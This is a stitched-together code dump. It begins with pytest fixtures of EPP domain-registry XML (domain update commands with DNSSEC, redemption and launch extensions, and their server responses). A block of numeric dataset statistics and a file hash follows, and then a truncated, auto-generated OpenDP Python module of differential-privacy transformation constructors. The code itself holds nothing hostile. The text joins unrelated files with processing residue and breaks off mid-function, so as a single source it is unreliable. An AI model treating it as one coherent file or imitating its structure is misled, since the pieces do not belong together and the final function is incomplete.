<domain:exDate>2002-09-08T22:00:00.0Z</domain:exDate>
</domain:trnData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def updatedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithsecdnsxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<extension>
<secDNS:update urgent="true" xmlns:secDNS="urn:ietf:params:xml:ns:secDNS-1.1">
<secDNS:add>
<secDNS:dsData>
<secDNS:keyTag>12346</secDNS:keyTag>
<secDNS:alg>3</secDNS:alg>
<secDNS:digestType>1</secDNS:digestType>
<secDNS:digest>38EC35D5B3A34B44C39B</secDNS:digest>
</secDNS:dsData>
</secDNS:add>
</secDNS:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithrgpxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<extension>
<rgp:update xmlns:rgp="urn:ietf:params:xml:ns:rgp-1.0">
<rgp:restore op="report">
<rgp:report>
<rgp:preData>Pre-delete registration data goes here. Both XML and free text are allowed.</rgp:preData>
<rgp:postData>Post-restore registration data goes here. Both XML and free text are allowed.</rgp:postData>
<rgp:delTime>2003-07-10T22:00:00.0Z</rgp:delTime>
<rgp:resTime>2003-07-20T22:00:00.0Z</rgp:resTime>
<rgp:resReason>Registrant error.</rgp:resReason>
<rgp:statement>This registrar has not restored the Registered Name in order to assume the rights to use or sell the Registered Name for itself or for any third party.</rgp:statement>
<rgp:statement lang="en">The information in this report is true to best of this registrar knowledge, and this registrar acknowledges that intentionally supplying false information in this report shall constitute an incurable material breach of the Registry-Registrar Agreement.</rgp:statement>
<rgp:other>Supporting information goes here.</rgp:other>
</rgp:report>
</rgp:restore>
</rgp:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithlaunchxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.com</domain:name>
<domain:add>
<domain:ns>
<domain:hostObj>ns2.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">mak21</domain:contact>
<domain:status lang="en" s="clientHold">Payment overdue.</domain:status>
</domain:add>
<domain:rem>
<domain:ns>
<domain:hostObj>ns1.example.com</domain:hostObj>
</domain:ns>
<domain:contact type="tech">sh8013</domain:contact>
<domain:status s="clientUpdateProhibited" />
</domain:rem>
<domain:chg>
<domain:registrant>sh8013</domain:registrant>
<domain:authInfo>
<domain:pw>2BARfoo</domain:pw>
</domain:authInfo>
</domain:chg>
</domain:update>
</update>
<extension>
<launch:update xmlns:launch="urn:ietf:params:xml:ns:launch-1.0">
<launch:phase>sunrise</launch:phase>
<launch:applicationID>abc123</launch:applicationID>
</launch:update>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def updatedomaincommandwithbrdomainxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<update>
<domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>teste.com.br</domain:name>
</domain:update>
</update>
<extension>
<brdomain:update xmlns:brdomain="urn:ietf:params:xml:ns:brdomain-1.0">
<brdomain:ticketNumber>ab-1234</brdomain:ticketNumber>
<brdomain:chg>
<brdomain:releaseProcessFlags flag1="1" />
<brdomain:autoRenew active="1" />
<brdomain:publicationStatus>onHold</brdomain:publicationStatus>
</brdomain:chg>
</brdomain:update>
</extension>
</command>
</epp>
"""
@pytest.fixture
def responseupdatedomaincommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseupdatedomaincommandwithbrdomainxmlexpected_case1():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='1000'>
<msg>Command completed successfully</msg>
</result>
<extension>
<brdomain:updData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:ticketNumber>123456</brdomain:ticketNumber>
<brdomain:pending>
<brdomain:doc status='notReceived'>
<brdomain:docType>CNPJ</brdomain:docType>
<brdomain:limit>2006-03-01T22:00:00.0Z</brdomain:limit>
<brdomain:description lang='pt'>Cadastro Nacional da Pessoa Juridica</brdomain:description>
</brdomain:doc>
</brdomain:pending>
</brdomain:updData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseupdatedomaincommandwithbrdomainxmlexpected_case2():
return """<epp xmlns='urn:ietf:params:xml:ns:epp-1.0'>
<response>
<result code='2308'>
<msg>Data management policy violation</msg>
<extValue>
<value xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:hostName>ns2.example.com</domain:hostName>
</value>
<reason>Query refused</reason>
</extValue>
</result>
<extension>
<brdomain:updData xmlns:brdomain='urn:ietf:params:xml:ns:brdomain-1.0'>
<brdomain:hostStatus>
<brdomain:hostName>ns2.example.com</brdomain:hostName>
<brdomain:dnsAnswer>Query refused</brdomain:dnsAnswer>
</brdomain:hostStatus>
<brdomain:publicationStatus publicationFlag="onHold">
<brdomain:onHoldReason>billing</brdomain:onHoldReason>
<brdomain:onHoldReason>dns</brdomain:onHoldReason>
</brdomain:publicationStatus>
</brdomain:updData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
| 32.706781
| 889
| 0.637455
| 3,867
| 34,244
| 5.64391
| 0.090251
| 0.028225
| 0.052417
| 0.064513
| 0.782772
| 0.767469
| 0.755464
| 0.745017
| 0.73709
| 0.716747
| 0
| 0.047161
| 0.199363
| 34,244
| 1,046
| 890
| 32.73805
| 0.748878
| 0
| 0
| 0.823893
| 0
| 0.08033
| 0.905034
| 0.469367
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038105
| false
| 0
| 0.00309
| 0.037075
| 0.0793
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
66710c7b51600d8ba1ac6a0a1058f23b25814d14
| 36,197
|
py
|
Python
|
python/src/opendp/trans.py
|
orespo/opendp
|
ba595c7b2a0c1e4240cbcf41bf358efff76988f1
|
[
"MIT"
] | null | null | null |
python/src/opendp/trans.py
|
orespo/opendp
|
ba595c7b2a0c1e4240cbcf41bf358efff76988f1
|
[
"MIT"
] | null | null | null |
python/src/opendp/trans.py
|
orespo/opendp
|
ba595c7b2a0c1e4240cbcf41bf358efff76988f1
|
[
"MIT"
] | null | null | null |
# Auto-generated. Do not edit.
from opendp._convert import *
from opendp._lib import *
from opendp.mod import *
from opendp.typing import *
__all__ = [
"make_cast",
"make_cast_default",
"make_is_equal",
"make_is_null",
"make_cast_inherent",
"make_cast_metric",
"make_clamp",
"make_unclamp",
"make_count",
"make_count_distinct",
"make_count_by",
"make_count_by_categories",
"make_split_lines",
"make_split_records",
"make_create_dataframe",
"make_split_dataframe",
"make_select_column",
"make_identity",
"make_impute_constant",
"make_impute_uniform_float",
"make_sized_bounded_mean",
"make_resize",
"make_bounded_resize",
"make_bounded_sum",
"make_sized_bounded_sum",
"make_sized_bounded_variance"
]
def make_cast(
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that casts a vector of data from type `TIA` to type `TOA`.
Failure to parse results in None, else Some<TOA>.
:param TIA: atomic input data type to cast from
:type TIA: RuntimeTypeDescriptor
:param TOA: atomic data type to cast into
:type TOA: RuntimeTypeDescriptor
:return: A cast step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TOA), Transformation))
def make_cast_default(
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that casts a vector of data from type `TIA` to type `TOA`. If cast fails, fill with default.
:param TIA: atomic input data type to cast from
:type TIA: RuntimeTypeDescriptor
:param TOA: atomic data type to cast into
:type TOA: RuntimeTypeDescriptor
:return: A cast_default step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast_default
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TOA), Transformation))
def make_is_equal(
value: Any,
TIA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that checks if each element is equal to `value`.
:param value: value to check against
:type value: Any
:param TIA: atomic input data type
:type TIA: RuntimeTypeDescriptor
:return: A is_equal step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse_or_infer(type_name=TIA, public_example=value)
# Convert arguments to c types.
value = py_to_c(value, c_type=AnyObjectPtr, type_name=TIA)
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_is_equal
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(value, TIA), Transformation))
def make_is_null(
DIA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that checks if each element in a vector is null.
:param DIA: atomic input domain
:type DIA: RuntimeTypeDescriptor
:return: A is_null step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
DIA = RuntimeType.parse(type_name=DIA)
# Convert arguments to c types.
DIA = py_to_c(DIA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_is_null
function.argtypes = [ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(DIA), Transformation))
def make_cast_inherent(
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that casts a vector of data from type `TI` to a type that can represent nullity `TO`.
If cast fails, fill with `TO`'s null value.
:param TIA: input data type to cast from
:type TIA: RuntimeTypeDescriptor
:param TOA: data type to cast into
:type TOA: RuntimeTypeDescriptor
:return: A cast_inherent step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast_inherent
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TOA), Transformation))
def make_cast_metric(
MI: DatasetMetric,
MO: DatasetMetric,
TA: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that converts the dataset metric from type `MI` to type `MO`.
:param MI: input dataset metric
:type MI: DatasetMetric
:param MO: output dataset metric
:type MO: DatasetMetric
:param TA: atomic type of data
:type TA: RuntimeTypeDescriptor
:return: A cast_metric step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
MI = RuntimeType.parse(type_name=MI)
MO = RuntimeType.parse(type_name=MO)
TA = RuntimeType.parse(type_name=TA)
# Convert arguments to c types.
MI = py_to_c(MI, c_type=ctypes.c_char_p)
MO = py_to_c(MO, c_type=ctypes.c_char_p)
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_cast_metric
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(MI, MO, TA), Transformation))
def make_clamp(
bounds: Tuple[Any, Any],
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that clamps numeric data in Vec<`T`> to `bounds`.
If datum is less than lower, let datum be lower.
If datum is greater than upper, let datum be upper.
:param bounds: Tuple of inclusive lower and upper bounds.
:type bounds: Tuple[Any, Any]
:param TA: atomic data type
:type TA: RuntimeTypeDescriptor
:return: A clamp step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_clamp
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, TA), Transformation))
def make_unclamp(
bounds: Tuple[Any, Any],
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that unclamps a VectorDomain<BoundedDomain<T>> to a VectorDomain<AllDomain<T>>.
:param bounds: Tuple of inclusive lower and upper bounds.
:type bounds: Tuple[Any, Any]
:param TA: atomic data type
:type TA: RuntimeTypeDescriptor
:return: A unclamp step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TA = RuntimeType.parse_or_infer(type_name=TA, public_example=get_first(bounds))
# Convert arguments to c types.
bounds = py_to_c(bounds, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Tuple', args=[TA, TA]))
TA = py_to_c(TA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_unclamp
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(bounds, TA), Transformation))
def make_count(
TIA: RuntimeTypeDescriptor,
TO: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes a count of the number of records in data.
:param TIA: Atomic Input Type. Input data is expected to be of the form Vec<TIA>.
:type TIA: RuntimeTypeDescriptor
:param TO: Output Type. Must be an integer.
:type TO: RuntimeTypeDescriptor
:return: A count step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TO = RuntimeType.parse(type_name=TO)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TO = py_to_c(TO, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TO), Transformation))
def make_count_distinct(
TIA: RuntimeTypeDescriptor,
TO: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes a count of the number of unique, distinct records in data.
:param TIA: Atomic Input Type. Input data is expected to be of the form Vec<TIA>.
:type TIA: RuntimeTypeDescriptor
:param TO: Output Type. Must be an integer.
:type TO: RuntimeTypeDescriptor
:return: A count_distinct step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
TIA = RuntimeType.parse(type_name=TIA)
TO = RuntimeType.parse(type_name=TO)
# Convert arguments to c types.
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TO = py_to_c(TO, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count_distinct
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(TIA, TO), Transformation))
def make_count_by(
size: int,
MO: SensitivityMetric,
TIA: RuntimeTypeDescriptor,
TOA: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes the count of each unique value in data.
This assumes that the category set is unknown.
This uses a restricted-sensitivity proof that takes advantage of known dataset size.
Use `make_resize` to establish dataset size.
Use meas.make_base_stability to release this query.
:param size: Number of records in input data.
:type size: int
:param MO: Output Metric.
:type MO: SensitivityMetric
:param TIA: Atomic Input Type. Categorical/hashable input data type. Input data must be Vec<TI>.
:type TIA: RuntimeTypeDescriptor
:param TOA: Atomic Output Type. Express counts in terms of this integral type.
:type TOA: RuntimeTypeDescriptor
:return: The carrier type is HashMap<TI, TO>- the counts for each unique data input.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
MO = RuntimeType.parse(type_name=MO)
TIA = RuntimeType.parse(type_name=TIA)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
size = py_to_c(size, c_type=ctypes.c_uint)
MO = py_to_c(MO, c_type=ctypes.c_char_p)
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count_by
function.argtypes = [ctypes.c_uint, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(size, MO, TIA, TOA), Transformation))
def make_count_by_categories(
categories: Any,
MO: SensitivityMetric = "L1Distance<i32>",
TIA: RuntimeTypeDescriptor = None,
TOA: RuntimeTypeDescriptor = "i32"
) -> Transformation:
"""Make a Transformation that computes the number of times each category appears in the data.
This assumes that the category set is known.
:param categories: The set of categories to compute counts for.
:type categories: Any
:param MO: output sensitivity metric
:type MO: SensitivityMetric
:param TIA: categorical/hashable input type. Input data must be Vec<TIA>.
:type TIA: RuntimeTypeDescriptor
:param TOA: express counts in terms of this integral type
:type TOA: RuntimeTypeDescriptor
:return: A count_by_categories step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
MO = RuntimeType.parse(type_name=MO)
TIA = RuntimeType.parse_or_infer(type_name=TIA, public_example=next(iter(categories), None))
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
categories = py_to_c(categories, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Vec', args=[TIA]))
MO = py_to_c(MO, c_type=ctypes.c_char_p)
TIA = py_to_c(TIA, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_count_by_categories
function.argtypes = [AnyObjectPtr, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(categories, MO, TIA, TOA), Transformation))
def make_split_lines(
) -> Transformation:
"""Make a Transformation that takes a string and splits it into a Vec<String> of its lines.
:return: A split_lines step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# No type arguments to standardize.
# No arguments to convert to c types.
# Call library function.
function = lib.opendp_trans__make_split_lines
function.argtypes = []
function.restype = FfiResult
return c_to_py(unwrap(function(), Transformation))
def make_split_records(
separator: str
) -> Transformation:
"""Make a Transformation that splits each record in a Vec<String> into a Vec<Vec<String>>.
:param separator: The token(s) that separate entries in each record.
:type separator: str
:return: A split_records step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# No type arguments to standardize.
# Convert arguments to c types.
separator = py_to_c(separator, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_split_records
function.argtypes = [ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(separator), Transformation))
def make_create_dataframe(
col_names: Any,
K: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that constructs a dataframe from a Vec<Vec<String>>.
:param col_names: Column names for each record entry.
:type col_names: Any
:param K: categorical/hashable data type of column names
:type K: RuntimeTypeDescriptor
:return: A create_dataframe step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
K = RuntimeType.parse_or_infer(type_name=K, public_example=next(iter(col_names), None))
# Convert arguments to c types.
col_names = py_to_c(col_names, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Vec', args=[K]))
K = py_to_c(K, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_create_dataframe
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(col_names, K), Transformation))
def make_split_dataframe(
separator: str,
col_names: Any,
K: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that splits each record in a String into a Vec<Vec<String>>,
and loads the resulting table into a dataframe keyed by `col_names`.
:param separator: The token(s) that separate entries in each record.
:type separator: str
:param col_names: Column names for each record entry.
:type col_names: Any
:param K: categorical/hashable data type of column names
:type K: RuntimeTypeDescriptor
:return: A split_dataframe step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
K = RuntimeType.parse_or_infer(type_name=K, public_example=next(iter(col_names), None))
# Convert arguments to c types.
separator = py_to_c(separator, c_type=ctypes.c_char_p)
col_names = py_to_c(col_names, c_type=AnyObjectPtr, type_name=RuntimeType(origin='Vec', args=[K]))
K = py_to_c(K, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_split_dataframe
function.argtypes = [ctypes.c_char_p, AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(separator, col_names, K), Transformation))
def make_select_column(
key: Any,
TOA: RuntimeTypeDescriptor,
K: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that retrieves the column `key` from a dataframe as Vec<`TOA`>.
:param key: categorical/hashable data type of the key/column name
:type key: Any
:param K: data type of the key
:type K: RuntimeTypeDescriptor
:param TOA: atomic data type to downcast to
:type TOA: RuntimeTypeDescriptor
:return: A select_column step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
K = RuntimeType.parse_or_infer(type_name=K, public_example=key)
TOA = RuntimeType.parse(type_name=TOA)
# Convert arguments to c types.
key = py_to_c(key, c_type=AnyObjectPtr, type_name=K)
K = py_to_c(K, c_type=ctypes.c_char_p)
TOA = py_to_c(TOA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_select_column
function.argtypes = [AnyObjectPtr, ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(key, K, TOA), Transformation))
def make_identity(
D: RuntimeTypeDescriptor,
M: RuntimeTypeDescriptor
) -> Transformation:
"""Make a Transformation that simply passes the data through.
:param D: Domain of the identity function. Must be VectorDomain<AllDomain<_>> or AllDomain<_>
:type D: RuntimeTypeDescriptor
:param M: metric. Must be a dataset metric if D is a VectorDomain or a sensitivity metric if D is an AllDomain
:type M: RuntimeTypeDescriptor
:return: A transformation where the input and output domain are D and the input and output metric are M
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
D = RuntimeType.parse(type_name=D)
M = RuntimeType.parse(type_name=M)
# Convert arguments to c types.
D = py_to_c(D, c_type=ctypes.c_char_p)
M = py_to_c(M, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_identity
function.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(D, M), Transformation))
def make_impute_constant(
constant: Any,
DA: RuntimeTypeDescriptor = "OptionNullDomain<AllDomain<TA>>"
) -> Transformation:
"""Make a Transformation that replaces null/None data with `constant`.
By default, the input type is Vec<Option<TA>>, as emitted by make_cast.
Set `DA` to InherentNullDomain<AllDomain<TA>> for imputing on types that have an inherent representation of nullity, like floats.
:param constant: Value to replace nulls with.
:type constant: Any
:param DA: domain of data being imputed. This is OptionNullDomain<AllDomain<TA>> or InherentNullDomain<AllDomain<TA>>
:type DA: RuntimeTypeDescriptor
:return: A impute_constant step.
:rtype: Transformation
:raises AssertionError: if an argument's type differs from the expected type
:raises UnknownTypeError: if a type-argument fails to parse
:raises OpenDPException: packaged error from the core OpenDP library
"""
assert_features("contrib")
# Standardize type arguments.
DA = RuntimeType.parse(type_name=DA, generics=["TA"])
TA = get_domain_atom_or_infer(DA, constant)
DA = DA.substitute(TA=TA)
# Convert arguments to c types.
constant = py_to_c(constant, c_type=AnyObjectPtr, type_name=TA)
DA = py_to_c(DA, c_type=ctypes.c_char_p)
# Call library function.
function = lib.opendp_trans__make_impute_constant
function.argtypes = [AnyObjectPtr, ctypes.c_char_p]
function.restype = FfiResult
return c_to_py(unwrap(function(constant, DA), Transformation))
def make_impute_uniform_float(
bounds: Tuple[Any, Any],
TA: RuntimeTypeDescriptor = None
) -> Transformation:
"""Make a Transformation that replaces null/None data in Vec<`TA`> with uniformly distributed floats within `bounds`.
